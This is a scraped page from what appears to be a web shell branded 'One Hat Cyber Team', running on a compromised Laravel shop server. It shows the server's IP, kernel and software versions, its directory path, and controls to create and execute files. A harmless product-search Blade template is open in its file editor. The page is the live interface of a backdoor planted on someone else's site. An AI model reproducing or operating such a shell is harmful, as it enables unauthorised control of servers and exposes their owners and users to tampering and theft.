One Hat Cyber Team
Your IP :
3.135.223.70
Server IP :
104.21.112.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
gftag.com
/
resources
/
views
/
includes
/
Edit File:
search_suggest.blade.php
@php function renderStarRating($rating, $maxRating = 5) { $fullStar = "<i class = 'far fa-star filled'></i>"; $halfStar = "<i class = 'far fa-star-half filled'></i>"; $emptyStar = "<i class = 'far fa-star'></i>"; $rating = $rating <= $maxRating ? $rating : $maxRating; $fullStarCount = (int) $rating; $halfStarCount = ceil($rating) - $fullStarCount; $emptyStarCount = $maxRating - $fullStarCount - $halfStarCount; $html = str_repeat($fullStar, $fullStarCount); $html .= str_repeat($halfStar, $halfStarCount); $html .= str_repeat($emptyStar, $emptyStarCount); $html = $html; return $html; } @endphp <div class="s-r-inner"> @foreach ($items as $item) <div class="product-card p-col"> <a class="product-thumb" href="{{route('front.product',$item->slug)}}"> <img class="lazy" alt="Product" src="{{asset('assets/images/'.$item->thumbnail)}}" style=""></a> <div class="product-card-body"> <h3 class="product-title"><a href="{{route('front.product',$item->slug)}}"> {{ strlen(strip_tags($item->name)) > 35 ? substr(strip_tags($item->name), 0, 35) : strip_tags($item->name) }} </a></h3> <div class="rating-stars"> {!! renderStarRating($item->reviews->avg('rating')) !!} </div> <h4 class="product-price"> {{PriceHelper::grandCurrencyPrice($item)}} </h4> </div> </div> @endforeach </div> <div class="bottom-area"> <a id="view_all_search_" href="javascript:;">{{ __('View all result') }}</a> </div>
Simpan